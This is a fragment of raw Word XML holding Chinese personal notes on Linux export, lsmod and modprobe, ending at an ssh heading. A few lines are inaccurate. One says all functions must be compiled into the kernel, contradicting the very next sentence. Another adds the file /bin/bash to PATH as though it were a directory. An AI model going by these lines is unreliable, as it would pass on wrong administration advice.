        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>的效力仅及于该次登陆操作。注销或者重新开一个窗口，</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>命令给出的环境变量都不存在了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我操作后，如果在</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>etc/profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中写了</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">xport xxx=xxx </w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，我登陆</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>syj</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> root</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后这个</w:t>
      </w:r>
      <w:r w:rsidR="00DB7CF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就不在了</w:t>
      </w:r>
      <w:r w:rsidR="00B071A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，如果要保留这个环境变量，必须</w:t>
      </w:r>
      <w:r w:rsidR="00B071A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B071A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">u – root </w:t>
      </w:r>
      <w:r w:rsidR="00B071A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>操作，得</w:t>
      </w:r>
      <w:r w:rsidR="00B071A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:r w:rsidR="00B071A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>杠</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965846E" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26964934" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该命令的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E83102D" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351088B5" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>export [-fnp][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]=[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量设置值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5659530E" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD42EFB" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561B266E" w14:textId="3873817A" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中为函数名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E1C3B" w14:textId="100C06F4" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除指定的变量。变量实际上并未删除，只是不会输出到后续指令的执行环境中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EADEE35" w14:textId="1D34DCEC" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列出所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋予程序的环境变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48177220" w14:textId="141EDAEB" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以只打出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看当前的所有环境变量。如果你要在某个环境变量（比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中加入一些新的路径（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），可以使用如下命令格式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46820BCB" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export PATH=/bin/bash:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45572129" w14:textId="060B4BB5" w:rsidR="000046B6" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B9ADD" w14:textId="77777777" w:rsidR="000046B6" w:rsidRDefault="000046B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07341DA5" w14:textId="7561FEA8" w:rsidR="000046B6" w:rsidRDefault="000046B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B736A51" w14:textId="25C285DC" w:rsidR="000046B6" w:rsidRDefault="000046B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329619FF" w14:textId="77777777" w:rsidR="000046B6" w:rsidRDefault="000046B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A173F49" w14:textId="684EF79B" w:rsidR="00DD040D" w:rsidRDefault="006D1D5D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Toc159779661"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w14:paraId="49FCA559" w14:textId="0502C27A" w:rsidR="00182878" w:rsidRDefault="00182878" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_Toc159779662"/>
      <w:r w:rsidRPr="00AC468B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lsmod</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w14:paraId="666AD3CB" w14:textId="31E21998" w:rsidR="006D1D5D" w:rsidRDefault="00563876" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00563876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00563876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C16432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lsmod</w:t>
      </w:r>
      <w:r w:rsidRPr="00563876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00563876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令，会</w:t>
      </w:r>
      <w:r w:rsidRPr="00C16432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列出所有已载入系统的模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00563876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00563876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="00563876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统的核心具有模块化的特性，因此在</w:t>
      </w:r>
      <w:r w:rsidRPr="00C16432">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>编译核心时，务须把全部的功能都放入核心</w:t>
      </w:r>
      <w:r w:rsidRPr="00563876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。您可以将这些功能编译成一个个单独的模块，待需要时再分别载入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DC4C13" w14:textId="1F02F938" w:rsidR="00DD040D" w:rsidRDefault="00DD040D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5FB48C" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65CF52BD" w14:textId="556A23DA" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Toc159779663"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>odprobe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w14:paraId="501FAB9D" w14:textId="4169CF0A" w:rsidR="00C16432" w:rsidRDefault="00C16432" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC468B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>modprobe</w:t>
      </w:r>
      <w:r w:rsidRPr="00C16432">
        <w:t xml:space="preserve"> nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CCE72A" w14:textId="059CED2B" w:rsidR="00DD040D" w:rsidRDefault="00AC468B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC468B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于向</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC468B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC468B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核添加可加载内核模块或从内核中删除可加载内核模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B89D73D" w14:textId="16060DF3" w:rsidR="00E43D96" w:rsidRDefault="00E43D96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>modprobe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序提供了比更基本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rmmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序更全面的“瑞士军刀”功能，具有以下优点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212E573" w14:textId="77777777" w:rsidR="00E43D96" w:rsidRDefault="00E43D96" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能够更直观地决定加载哪些模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F93FA5" w14:textId="77777777" w:rsidR="00E43D96" w:rsidRDefault="00E43D96" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解模块依赖性，以便在请求加载模块时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>modprobe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先添加其他所需的模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26408B2D" w14:textId="49FD2D19" w:rsidR="00DD040D" w:rsidRDefault="00E43D96" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据需要解决递归模块依赖关系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B7E9D5" w14:textId="7A924A5F" w:rsidR="00E43D96" w:rsidRDefault="00E43D96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB0FF1B" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62386266" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50353F7A" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">modprobe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，用于加载和管理内核模块（驱动程序）。它可以自动处理模块之间的依赖关系，当需要加载某个模块时，会自动加载所依赖的其他模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D10EAD" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602CD724" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">modprobe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的常见用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346672E" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF12727" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载模块：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>modprobe &lt;module_name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这将尝试加载指定的内核模块。如果该模块依赖于其他模块，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">modprobe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会自动加载这些依赖模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7477DC08" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载模块：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>modprobe -r &lt;module_name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这将尝试卸载指定的内核模块。如果其他模块依赖于要卸载的模块，卸载操作将失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35410915" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示模块信息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>modprobe -D &lt;module_name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这将显示指定模块的详细信息，包括模块的路径、依赖关系等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B062CF1" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE7254A" w14:textId="56F6E9DF" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">modprobe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个强大的工具，用于处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核模块的加载和卸载。不过，在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> modprobe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，请确保了解您正在操作的模块，因为错误地加载或卸载模块可能导致系统不稳定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B410326" w14:textId="77777777" w:rsidR="000E4A37" w:rsidRDefault="000E4A37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B527D46" w14:textId="77777777" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03081118" w14:textId="7132DC37" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
